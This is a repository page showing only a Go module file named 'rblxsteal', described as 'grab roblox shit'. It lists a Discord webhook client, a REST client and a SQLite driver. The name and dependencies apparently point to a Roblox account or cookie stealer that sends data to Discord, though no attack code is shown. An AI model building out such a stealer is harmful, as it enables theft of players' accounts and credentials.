grab roblox shit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

11 lines
234B

  1. module rblxsteal
  2. go 1.20
  3. require (
  4. github.com/DisgoOrg/disgohook v1.4.4 // indirect
  5. github.com/DisgoOrg/log v1.1.0 // indirect
  6. github.com/DisgoOrg/restclient v1.2.8 // indirect
  7. github.com/mattn/go-sqlite3 v1.14.16 // indirect
  8. )